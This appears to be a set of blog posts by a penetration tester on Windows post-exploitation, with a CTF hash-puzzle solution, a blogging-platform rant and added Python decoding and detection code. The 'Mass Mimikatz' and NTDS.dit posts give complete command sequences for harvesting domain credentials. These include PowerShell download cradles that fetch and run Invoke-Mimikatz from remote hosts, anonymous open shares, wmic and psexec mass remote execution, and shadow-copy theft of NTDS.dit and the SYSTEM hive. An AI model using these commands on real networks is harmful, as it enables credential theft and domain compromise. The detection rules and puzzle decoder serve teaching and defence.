
Tuesday, October 08, 2013

Outlook Cached Attachments

I happened upon an interesting directory today that I didn’t know about:

%USERPROFILE%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\

In that directory was what looked to be a randomly generated 8-character directory (e.g. A821ZSQI), which held a bunch of attachments from my email (not just my inbox).

According to Microsoft KB 817878 this is a “Secure” temp folder whose location can be identified by a handy dandy registry key (Outlook 2010 referenced; the KB has others):

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Security

I tested this out with an email that was encrypted. Once the file was opened it landed in the temp directory and stayed there after I closed the email and Outlook.

This is definitely going on the top of my Post-Exploitation click scripts.



Sunday, October 06, 2013

Dumping a Domain Worth of Passwords With Mimikatz

clymb3r recently posted a script called “Invoke-Mimikatz.ps1”. Basically what it does is reflectively inject mimikatz into memory, call for all the logonPasswords and exit. It even checks the target's architecture (x86/x64) first and injects the correct DLL.

You can very easily use this script directly from an admin command prompt, like so:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

(This works REALLY well for Citrix and kiosk scenarios, and it isn’t too hard to type/remember.) This runs the PowerShell script by pulling it directly from GitHub and executing it “in memory” on your system.

One of the awesome added capabilities of this script is to run it against a list of hosts, like so:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"

This works great as all the output lands directly on your system and everything is executed through PowerShell Remoting. PowerShell Remoting is pretty much the same as WinRM. This service, however, is not enabled by default, and it can be pretty hit or miss how much any given enterprise uses WinRM. That said, it is usually the servers and more important systems that have it enabled more often than not.

You can find WinRM / PowerShell Remoting by scanning for the service port 47001 as well as the default comm ports for WinRM 5985 (HTTP) and 5986 (HTTPS).

If you find that your target isn’t a WinRM-rich environment, or you just want more passwords, you can take a slightly more painful route I call “Mass Mimikatz”.

Step 1. 

Make a share. We are doing this not only so we can collect the output of all our computers' passwords, but also to host the CMD batch file that will run the PowerShell script:

cd\
mkdir open
net share open=C:\open /grant:everyone,full
icacls C:\open\ /grant Everyone:(OI)(CI)F /t

We are setting “Everyone” permissions at both the share (net share) and NTFS (icacls) level for this to work properly.

Step 2.

Set registry keys. There are two registry keys that we need to set. The first allows null sessions to our new share and the second gives null users the “Everyone” token so that we don’t have to get crazy with our permissions. I have created a meterpreter script with a bunch of error checking here: massmimi_reg.rb, or you can just make the following changes:

HKLM\System\CurrentControlSet\services\LanmanServer\Parameters NullSessionShares REG_MULTI_SZ = open
HKLM\System\CurrentControlSet\Control\Lsa "EveryoneIncludesAnonymous" = 1

Step 3.

Change directory into the new “open” directory. This is so our uploads, and in particular our web server, are hosted out of the correct directory.

Step 4.

Upload the PowerShell launcher powermeup.cmd – this script will run our hosted Invoke-Mimikatz script on each host:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.127:8080/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > \\192.168.1.127\open\%COMPUTERNAME%.txt 2>&1"

Step 5.

Upload clymb3r’s Invoke-Mimikatz.ps1 – download it from the PowerSploit repo: source on github

Step 6.

Upload mongoose: Downloads Page – both the regular and tiny versions work. This is an awesome single-executable web server that supports Lua, SQLite and WebDAV out of the box. The tiny version is under 100k.

Step 7.

Upload serverlist.txt – this is a line-by-line list of computer names to run mimikatz on. You’ll have to gather this one way or another.

Step 8.

Execute mongoose (from the directory with mimikatz.ps1) – this will start a listener with directory listings enabled, on port 8080 by default.

Step 9a.

Execute wmic:

wmic /node:@serverlist.txt process call create "\\192.168.92.127\open\powershellme.cmd"

Step 9b.

Execute wmic with creds:

wmic /node:@serverlist.txt /user:PROJECTMENTOR\jdoe /password:ASDqwe123 process call create "\\192.168.92.127\open\powershellme.cmd"

Step 10.

Watch as text files full of wonder and joy fill your share.

You can find the scripts here: https://github.com/mubix/post-exploitation/tree/master/scripts/mass_mimikatz

Don’t forget to clean up:

  1. kill mongoose process
  2. net share open /delete
  3. kill/reset registry values
  4. delete “open” directory

Got a better way of getting this done? Please leave a comment.

P.S. You could just enable Powershell Remoting for them ;)

psexec @serverlist.txt -u [admin account name] -p [admin account password] -h -d powershell.exe "enable-psremoting -force"

"Passwords, here, here, here, EVERYWHERE!"


Saturday, October 05, 2013

Vanilla Cake #DerbyCake 2013 Solution

One of the most contested parts of the #DerbyCake contest was the hint on the Vanilla cake. It was just a long string of 1s and 0s. The hint that I kept telling everyone is that the “binary is binary” and I meant it. You weren’t supposed to hash or do anything special with it.

The reason this particular challenge is in the contest is that I run into this scenario a lot. Many times when I access binary password fields in either the Windows registry or in database servers the data comes out in 1s and 0s or some other binary format and I have to convert it back into its original hash format.

The solution therefore is pretty straightforward. You start with your very long binary string (I’m using Ruby, but it's pretty much the same in Python or another language):

cakestring = '01111101011110101110111111100110101110010001000111010101010110010000100110100010011011110110010001111110101010101010111110100111000111101101001011010010001100011110101100100110101011011011001110100001010110100100101000100010100111110011100001000110100101101100101010110011011000100010001110111100011011100001011011100001111111000110101111110111101111011101110001000100010010001001001010001100101010100000000111000000100110001100011011100010010101001110000011100001100000010111111100100000011101100100011001110101'

Then you “pack” the binary into a string format:

reverse1 = [cakestring].pack("b*")

And finally into the hex format of the SHA512 hash (most people got that it was a 512-bit hash due to the 512 bits):

puts "Hash: #{reverse1.unpack("H*").first}"

That easy. Resulting in an easily cracked SHA512 hash (that is, if you got all the hints in the DerbyCon presenters' slides):

Hash: be5ef7679d88ab9a9045f6267e55f5e5784b4b8cd764b5cd855a5244f91c626953cd46c43d7668873fd6efbd3b221249315580031963472a078781fe046e62ae
Password: correct horse battery staple

Here is how you would generate such a challenge if you were so inclined:

#!/usr/bin/env ruby
require 'digest/sha2'

password = "correct horse battery staple"
puts "Password: #{password}"
forwards1 = Digest::SHA512.hexdigest(password)
puts "Hash: #{forwards1}"

# Split the hex digest into byte pairs and turn each pair back into a raw byte
forwards2 = forwards1.scan(/../)
forwards3 = []
forwards2.each do |f2|
    forwards3 << f2.hex.chr
end
forwards4 = forwards3.join

# unpack("b*") emits each byte's bits least-significant bit first, which is the
# order the cake used (and the order pack("b*") expects when reversing it)
puts "Binary: #{forwards4.unpack("b*").first}"
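The pack("b*") step above packs each group of 8 characters least-significant bit first, so reading the same string MSB-first gives a completely different hex value. The following Python example (added here, not part of the post) generalizes the conversion: it decodes a dumped bit string in both bit orders, guesses the digest type from the bit count, and reports which reading matches SHA-512 of a candidate password. The cake string is the one from the post; the function names are my own.

```python
import hashlib

# Digest sizes in bits and the hash they usually indicate (a hint, not proof)
DIGEST_BITS = {128: "MD5", 160: "SHA-1", 256: "SHA-256", 384: "SHA-384", 512: "SHA-512"}

# The vanilla cake's bit string, copied from the post above
CAKE = "01111101011110101110111111100110101110010001000111010101010110010000100110100010011011110110010001111110101010101010111110100111000111101101001011010010001100011110101100100110101011011011001110100001010110100100101000100010100111110011100001000110100101101100101010110011011000100010001110111100011011100001011011100001111111000110101111110111101111011101110001000100010010001001001010001100101010100000000111000000100110001100011011100010010101001110000011100001100000010111111100100000011101100100011001110101"


def bits_to_bytes(bits, lsb_first=True):
    """Pack a string of '0'/'1' characters into bytes.

    lsb_first=True mirrors Ruby's pack("b*"), the order the cake used: the
    first character of each 8-character group is bit 0 of that byte.
    lsb_first=False mirrors pack("B*"): the first character is bit 7.
    """
    clean = "".join(c for c in bits if c in "01")
    if len(clean) % 8:
        raise ValueError("bit string length %d is not a multiple of 8" % len(clean))
    out = bytearray()
    for i in range(0, len(clean), 8):
        group = clean[i:i + 8]
        out.append(int(group[::-1] if lsb_first else group, 2))
    return bytes(out)


def bytes_to_bits(data, lsb_first=True):
    """Inverse of bits_to_bytes; mirrors Ruby's unpack("b*") / unpack("B*")."""
    groups = [format(b, "08b") for b in data]
    return "".join(g[::-1] if lsb_first else g for g in groups)


def decode_binary_hash(bits):
    """Give both bit-order readings of a dumped bit string plus a size-based hint."""
    clean = "".join(c for c in bits if c in "01")
    return {
        "bits": len(clean),
        "hint": DIGEST_BITS.get(len(clean), "unknown"),
        "lsb_first_hex": bits_to_bytes(clean, True).hex(),
        "msb_first_hex": bits_to_bytes(clean, False).hex(),
    }


def password_to_bits(password, lsb_first=True):
    """Build a 512-bit challenge string from a password, like the post's Ruby generator."""
    return bytes_to_bits(hashlib.sha512(password.encode()).digest(), lsb_first)


def matches_password(bits, password):
    """Return which bit order reads as SHA-512(password), or None if neither does."""
    clean = "".join(c for c in bits if c in "01")
    if len(clean) != 512:
        return None
    want = hashlib.sha512(password.encode()).hexdigest()
    info = decode_binary_hash(clean)
    for order in ("lsb_first", "msb_first"):
        if info[order + "_hex"] == want:
            return order
    return None


if __name__ == "__main__":
    info = decode_binary_hash(CAKE)
    print("bits: %d (%s)" % (info["bits"], info["hint"]))
    print("pack('b*') reading:", info["lsb_first_hex"])
    print("pack('B*') reading:", info["msb_first_hex"])
    print("order matching the cake password:", matches_password(CAKE, "correct horse battery staple"))
```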

You can find a write up of the rest of the challenges and hints over on Ryan Fenno’s blog here: http://slae412.wordpress.com/2013/10/04/derbycake-2013-write-up/

Sorry to everyone who beat their head upside the wall for hours on this one. I was actually expecting this to be the first challenge to fall.

Friday, October 04, 2013

Mass Mimikatz

1. Make Share:

cd\

mkdir open

net share open=C:\open /grant:everyone,full

icacls C:\open\ /grant Everyone:(OI)(CI)F /t

2. Set registry keys (massmimi_reg.rb meterpreter script):

reg change HKLM\System\CurrentControlSet\services\LanmanServer\Parameters NullSessionShares REG_MULTI_SZ open

reg change HKLM\System\CurrentControlSet\Control\Lsa "EveryoneIncludesAnonymous" 1

3. Change directory into new “open” directory

4. Upload powershell script (powermeup.cmd):

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.127:8080/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > \\192.168.1.127\open\%COMPUTERNAME%.txt 2>&1"

5. Upload clymb3r’s Invoke-Mimikatz.ps1 - Download from PowerSploit repo: source on github

6. Upload mongoose: Downloads Page (Updated to use Archive.org version) - Both regular and tiny versions work

7. Upload serverlist.txt - This is a line by line list of computer names to use mimikatz on.

8. Execute mongoose (from directory with mimikatz.ps1) - This will start a listener with directory listings enabled on port 8080 by default

9. Execute wmic:

wmic /node:@serverlist.txt process call create "\\192.168.92.127\open\powershellme.cmd"

9a. Execute wmic with creds:

wmic /node:@serverlist.txt /user:PROJECTMENTOR\jdoe /password:ASDqwe123 process call create "\\192.168.92.127\open\powershellme.cmd"

clean up:
1. kill mongoose process
2. net share open /delete
3. kill registry values
4. delete “open” directory

Tuesday, September 17, 2013

Blogging Requirements

So I’ve been trying out blogging software and platforms up and down the Internet streets, and I really haven’t found one that works really well (IMHO).

Until @daanraman suggested Roon.io, which I hadn’t heard of yet. I have to admit, it has probably one of the best designed interfaces I’ve seen. I don’t need micromanaging control over a blog. I have pretty basic needs actually.
  1. I have to be able to blog from where I want to blog. Oddly enough this is where most newer blogging platforms fall down. Your amazing Javascript editor that took you 500 hours to get right is just something I’m not going to use all that often. It's pretty rare for me to want to blog inside of a browser actually. I usually have 100 tabs open and your stupid editor is often lost in the mix. It’s just nice to have something separate that I can pull things I have in those 100 browser tabs into without having to find the editor tab again. (Yes, I realize I can pull out another window, but then the editors usually don’t fit.)
  2. I post code snippets, directory listings and a ton of other things that I don’t want officially rendered. This is probably not a common problem among bloggers, but I can’t count how many times and on how many platforms I couldn't get a simple Windows directory listing to display correctly without trying to figure out what code finagling I had to do to get the blogging platform to display it the way I needed it to. I will use whatever syntax is needed; I just can’t be expected to remember every undocumented workaround to get an HTML tag to display without rendering.
  3. This is a bit of #1, but I need to be able to blog with ease. If it takes me 40 minutes just to get formatting correct or to fix blogging software to blogging platform incompatibility issues, I’m just going to stop trying. Or if it takes me 10 minutes of git update, git push etc. to add a new post, it just isn’t worth it. (I realize you can script Octopress up, but then you’ll have it scripted up in one location/computer, which goes against #1.)
  4. I really don’t care how many templates or formats you have, as long as one is actually readable. I know most customers/bloggers want their ads, and support, and logos and stuff everywhere. I’m not them. If the reader has an easy time reading my content, I’m happy.
  5. I will pay for these conveniences. I’ve been paying SquareSpace for close to 4 years now, about $20 per month. I actually don’t want my blogging service to be free. The reason for this is because free == I’m the product. I don’t want ads to one day creep into my site because the developer of the blogging platform needs money to live on. I would rather pay them directly. The other thing that “free” breeds is direction inflicted by the one paying the bills. I use the word “inflicted” quite specifically since I have seen some blogging platforms go down the tubes because their VC had some “brilliant” ideas. I’d pay fair pay for fair service.
  6. A developer/team/support who listen. I don’t care if they say “sorry, not something we are looking at doing”; that's fair, it's their software, not mine, and I’m a big boy, I can move on if it's something I care about. But honestly, I have no idea why most applications don’t have a ‘vote for a feature’ option/service, or at the very least “feature request” buttons.
  7. Hosted. I’m very much done trying to protect and secure a platform or OS that my blog is hosted on. I’d rather spend my time on other things, like, you know, generating content.
Anywho, that's my rant on what I’d love to see in a blogging platform. I promised someone I would write it up, so here it is.

Thursday, June 20, 2013

Volume Shadow Copy NTDS.dit Domain Hashes Remotely - Part 1

This and part 2 are mostly just an update to http://securityweekly.com/2011/11/02/safely-dumping-hashes-from-liv/ but without the need for VSSOwn; we are also doing it remotely, without the need for a shell on the DC.
Ever run into a Domain Controller that wasn’t allowed to talk to the Internet, had insane AV, and GPOs not allowing anyone to RDP in (even Domain Admins) unless they provided some kind of voodoo happy dance? Ya, me neither, but here is how you can still dump domain hashes and hash history if you run into that case. Let's start.

First authenticate to the domain controller and make sure you have a good working directory to use.

net use \\DC1 /user:DOMAIN\domainadminsvc domainadminsvc123
dir \\DC1\C$

Alright, let's say “TEMP” is there and it’s empty on the remote DC. The way we are going to run commands will not let us get results directly, so we are going to use a temp file on the DC in C:\TEMP, which we already made sure is clear.

We are going to use Volume Shadow Copies to pull the NTDS.dit file (Active Directory’s DB, much like Windows’ SAM file except that it stores the entire set of AD objects); we also need the SYSTEM registry hive. You can get the SAM registry hive as well, but that will only get local DC credentials.

So let's list the current volume shadow copies to see if we need to create one, from a Windows command prompt (or, if you’ve installed wmic for Linux, via http://www.krenger.ch/blog/wmi-commands-from-linux/ ). This IS an interactive command, so it won’t work very nicely in a Meterpreter shell:

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin list shadows > C:\temp\output.txt 2>&1"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 7304;
        ReturnValue = 0;
};

To break down this command:

  • wmic /node:DC1 – tells it to interact with the WMI API on DC1
  • /user:DOMAIN\domainadminsvc /password:domainadminsvc123 – authentication
  • process call create – WMI speak for create a process
  • cmd /c – vssadmin doesn’t operate outside of cmd for some reason…
  • vssadmin list shadows – list any shadow volumes that already exist
  • > C:\temp\output.txt 2>&1 – send STDOUT and STDERR to a text file in C:\TEMP on DC1 (the file redirect has to come first; with 2>&1 before it, stderr would still go to the non-existent console). Make sure you specify the full path, because you will be executing from within C:\Windows\System32 and it's a pain to find anything in that directory. So if you just specify > bob.txt you get to hunt for bob.txt in C:\Windows\System32 or wherever WMI wants to execute you from.

The process starts, and then you need to view the output file by copying it down, running type \\DC1\C$\TEMP\output.txt, or mounting the C drive as a network share. Either way you should see something like this:

C:\temp>type output.txt
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

Contents of shadow copy set ID: {671090fd-0198}
   Contained 1 shadow copies at creation time: 5/31/2013 11:29:03 AM
      Shadow Copy ID: {0863e309}
         Original Volume: (C:)\\?\Volume{c44da10e-0154-11e1-b968-806e6f6e6963}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: wpad
         Service Machine: wpad
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessibleWriters
         Attributes: Persistent, Client-accessible, No auto release, Differential, Auto recovered

or

C:\temp>type output.txt
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

No items found that satisfy the query
If there are no shadow copies, or the ones there are too old (look at the creation time), you can create a shadow copy using the ‘vssadmin create shadow /for=C:’ command. (This command only applies to Server OS (Win2k3/Win2k8), but since those are the only two that commonly have NTDS.dit files we don’t have to remember this):

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin create shadow /for=C: > C:\temp\output.txt 2>&1"

The other thing to keep in mind is that NTDS.dit isn’t always on the main drive. It is commonly on a “D” drive for safety in case a HDD goes bad or something. But it should always be in a folder called NTDS. (By default this is C:\Windows\NTDS.)

Next we just copy the files out of the shadow copies. First the SYSTEM hive:

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM.hive > C:\temp\output.txt 2>&1"

Then the NTDS.dit (notice this one isn’t in System32):

C:\temp>wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit > C:\temp\output.txt 2>&1"

In Kali Linux you could use the WMIS package to do much the same thing:

root@kali:~# wmis -U DOMAIN\domainadminsvc%domainadminsvc123 //DC1 cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit > C:\temp\output.txt 2>&1
NTSTATUS: NT_STATUS_OK - Success

Copy those files to your own system for offline extraction which I’ll cover in part 2.
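The WMI-launched Invoke-Mimikatz run from the share (Dumping a Domain Worth of Passwords, above) and the vssadmin / shadow-copy file copies in this post both leave distinctive process-creation command lines on the targets. This Python example (added here; not from the posts or from mubix's scripts) runs a handful of detection rules over constructed Sysmon-style events; the field names, host names and rule names are assumptions, and the command lines are the ones shown in the posts.

```python
import re

# Constructed sample process-creation events (Sysmon-style field names, made-up hosts);
# the command lines mirror the ones shown in the posts.
SAMPLE_EVENTS = [
    {"host": "DC1", "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c vssadmin create shadow /for=C: > C:\temp\output.txt 2>&1"},
    {"host": "DC1", "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit"},
    {"host": "WS1", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.127:8080/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"'''},
    {"host": "OPS1", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r'wmic /node:@serverlist.txt process call create "\\192.168.92.127\open\powershellme.cmd"'},
    {"host": "WS2", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\jdoe\notes.txt"},
]

# (rule name, pattern matched against CommandLine); the names are my own
RULES = [
    ("download_cradle",
     re.compile(r"(IEX|Invoke-Expression)\b.*DownloadString\s*\(", re.I)),
    ("mimikatz_invocation",
     re.compile(r"Invoke-Mimikatz|-DumpCreds|logonPasswords", re.I)),
    ("wmic_remote_exec_from_share",
     re.compile(r'\bwmic\b.*\bprocess\s+call\s+create\s+"?\\\\', re.I)),
    ("vss_shadow_create",
     re.compile(r"\bvssadmin(\.exe)?\b.*\bcreate\s+shadow\b", re.I)),
    ("shadow_copy_credential_file",
     re.compile(r"HarddiskVolumeShadowCopy\d+\\.*(NTDS\.dit|config\\SYSTEM)", re.I)),
]


def evaluate(event):
    """Return the rules that fire on one event, plus whether WMI spawned it."""
    fired = [name for name, rx in RULES if rx.search(event.get("CommandLine", ""))]
    # Win32_Process.Create (what "wmic process call create" uses) runs the new
    # process under WmiPrvSE.exe on the target, so that parent is useful context.
    parent = event.get("ParentImage", "").lower()
    return {"host": event.get("host", "?"), "rules": fired,
            "wmi_spawned": parent.endswith("wmiprvse.exe")}


def scan(events):
    """Evaluate every event and keep only those that fired at least one rule."""
    return [r for r in (evaluate(e) for e in events) if r["rules"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        flag = " (spawned via WMI)" if hit["wmi_spawned"] else ""
        print("%s: %s%s" % (hit["host"], ", ".join(hit["rules"]), flag))
```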

Sunday, October 21, 2012

Setting SYSTEM's Proxy Settings With Metasploit

One of the great things about the reverse_http(s) payloads is that they are proxy aware. However, one of the pitfalls is that SYSTEM doesn’t have proxy settings, nor do users who have never logged into a system (unless profile loading is triggered). The problem arises when you are trying to do anything as SYSTEM; also, PSEXEC only has the option of getting you a SYSTEM shell (so you’re done for right out of the door).

Now, there is a stub in Metasploit that I have been unable to complete due to my lack of knowledge in the shellcode world. The stub allows you to create payloads that have static proxies, which would basically remove the need for the following. Until then, here are a few ways to set / read the proxy settings for SYSTEM, or any other user for that matter.

It's here if you want to take a whack at it:
external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm

One of the ways @carnal0wnage and I demoed at DerbyCon was using the bitsadmin binary. Windows 7/Vista/2008 come with version 2.0+, which has this great ability to run the following:

bitsadmin /util /setieproxy localsystem MANUAL_PROXY 192.168.1.55:3128 ";"

(On 2000, XP and 2003 you could upload a copy of bitsadmin that was new enough, and that would still work.)

That command sets the proxy settings for the SYSTEM account. I was able to jump through hoops and do this remotely by using the windows/exec payload via psexec, then reverse_http(s) would work.

But I wanted a better way to do this. I watched the execution of bitsadmin to see what it was doing, and all it was actually doing was setting a registry key. Awesome, I can do that.

Enter enum_proxy:

And…

If you’ve noticed the RHOST option, Metasploit has the ability to do remote registry calls as well (this module will attempt to start the RemoteRegistry service if the user has the privilege to do so):

Output from it finding a disabled RemoteRegistry:

msf post(enum_proxy) > run

[-] Unable to contact remote registry service on 172.16.10.217
[*] Attempting to start service remotely...
[*] Proxy Counter = 9
[*] Setting: WPAD and AutoConfigure script
[*] AutoConfigURL: http://anotherproxyserver/pac.pac
[*] Post module execution completed

“Awesome but you promised setting the proxy settings”, well right now all I can give you is a cloner ;–)

Enter clone_proxy_settings module:

And that's it. Still working on an actual “set_proxy” module, but this should do for now, and a lot less to type.

As of this post both are currently pull requests: